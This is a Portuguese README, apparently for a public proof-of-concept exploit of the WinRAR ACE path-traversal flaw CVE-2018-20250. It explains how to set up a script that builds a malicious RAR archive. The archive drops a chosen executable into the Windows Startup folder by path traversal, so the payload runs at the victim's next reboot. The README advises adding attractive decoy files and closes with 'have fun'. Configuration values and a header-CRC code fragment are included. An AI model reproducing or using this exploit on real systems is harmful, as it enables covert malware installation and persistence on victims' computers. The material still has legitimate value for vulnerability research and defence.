
Script de exploração para CVE-2018-20250 que gera automaticamente arquivos RAR maliciosos para alcançar execução de código através da vulnerabilidade de extração de arquivos ACE do WinRAR.
exploit para Extrair Execução de Código do WinRAR
poc por Ridter
como usar?
você só precisa instalar o Python 3.7 e preparar um arquivo malicioso que deseja executar, definir os valores desejados, este script de exploit gerará o arquivo malicioso automaticamente!
... ...
# O nome do arquivo do archive que você deseja
rar_filename = "test.rar"
# O arquivo malicioso que você deseja executar
evil_filename = "calc.exe"
# O caminho de descompressão desejado, conforme mostrado abaixo
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Outros arquivos a serem exibidos quando a vítima abrir o winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# Este comando pode ser diferente, depende do seu ambiente Python3.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
execute o exploit, o exploit gera o test.rar automaticamente
se a vítima abrir o test.rar, ela verá os arquivos hello.txt e world.txt, você também pode adicionar mais arquivos, mais atraentes.
![]()
hi.exe, na verdade é um calc.exe. quando ela reiniciar o computador, o hi.exe será executado.![]()
divirta-se! :)